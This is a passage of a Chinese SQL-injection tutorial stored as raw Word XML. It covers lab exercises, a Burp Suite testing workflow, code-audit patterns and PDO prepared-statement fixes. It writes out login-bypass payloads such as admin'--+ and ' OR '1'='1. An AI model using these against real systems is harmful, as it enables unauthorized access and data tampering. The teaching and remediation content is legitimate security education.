          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，存在通配符干扰。通过单引号闭合通配符，搭配OR永真条件，可查询全部搜索数据，是前台搜索框最常见的漏洞类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E45DC3">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="heading_37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.4 POST登录万能密码注入（Less-6）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="511B220A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心特征：后台登录接口动态拼接用户名、密码参数。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>admin'--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注释密码校验逻辑，或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>永真条件，可无需密码直接登录后台，造成权限越权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F63DE9D">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="heading_38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.5 INSERT注册注入（Less-7）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="7D5665F6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心特征：注册接口拼接INSERT语句，攻击者可闭合VALUES参数，绕过非空、格式校验，自定义插入数据，污染数据库数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F29F87">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="heading_39"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.6 UPDATE数据篡改注入（Less-8）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="08CB75F5">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心特征：密码修改接口拼接UPDATE语句，恶意参数可篡改全部用户密码，甚至通过子查询读取隐藏表数据，危害等级极高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995BB29">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="heading_40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7 Burp Suite渗透测试实操方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="4769A4A7">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite是Web渗透测试标准化工具，可实现请求拦截、篡改、批量测试，适配SQL注入自动化检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45C161">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="heading_41"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.1 基础测试流程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4008CD2A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代理配置 → 拦截业务请求 → 转发至Repeater → 手动篡改参数测试Payload → 分析响应结果 → Intruder批量爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74DE6A">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="heading_42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.2 手动注入测试实操</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3B66A72D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>拦截搜索、登录、注册接口请求，在参数位置依次注入单引号、OR永真、UNION查询Payload，对比响应包长度、内容变化：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 响应出现SQL报错 → 存在注入漏洞；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 响应返回全量数据 → 永真注入生效；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. 响应返回自定义数据 → UNION注入生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8992EE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="heading_43"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.3 自动化批量爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5BABC24A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用Intruder模块加载通用SQL注入Payload字典，批量测试参数漏洞，快速扫描高危注入点，提升测试效率，适配批量安全检测场景。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB1192">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="heading_44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 漏洞代码审计方法论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="6DF436E2">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>总结通用型SQL注入代码审计规则，适配PHP、Java、Python等主流开发语言，快速定位高危漏洞代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7545C2">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="heading_45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8.1 核心审计入口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="78A32D16">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP语言：检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>mysqli_query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$pdo-&gt;query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等动态SQL执行函数；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java MyBatis：重点检索XML文件中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>${}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变量拼接（高危），区别于安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t xml:space="preserve">#{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数化查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A84B3B">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="heading_46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8.2 六大高危漏洞代码模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="149910FB">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. GET/POST参数直接拼接SQL语句；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 字符型参数无引号闭合过滤，直接嵌入查询；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. LIKE模糊查询直接拼接用户输入；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. ORDER BY排序字段动态拼接用户参数；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. IN查询多参数直接字符串拼接；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. INSERT/UPDATE/DML语句动态拼接用户可控数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE3DDA">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="heading_47"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8.3 漏洞判定标准</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="2957D09D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>同时满足“用户输入可控+动态字符串拼接+无安全过滤”三个条件，即可判定为存在SQL注入高危漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35532CD5">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="heading_48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9 分层级漏洞安全修复方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="64CFA0CA">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于OWASP官方防护规范，结合漏洞场景，落地三类由优到次的修复方案，形成纵深防御体系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB04BB">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="heading_49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9.1 核心最优方案：参数化预处理查询（推荐）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="6BCF2C96">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：将SQL语法结构与用户数据完全隔离，提前编译SQL模板，参数单独绑定，用户输入永远不会被解析为SQL语法，可100%防御所有SQL注入场景。适配99%的业务场景，是行业标准修复方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91D4C0">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心PHP-PDO安全代码：</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080593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A81CC27">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$pdo = new PDO('mysql:host=localhost;dbname=security;charset=utf8', 'root', 'root', [</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    PDO::ATTR_EMULATE_PREPARES =&gt; false, // 关闭模拟预处理，启用原生安全机制</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>]);</w:t>
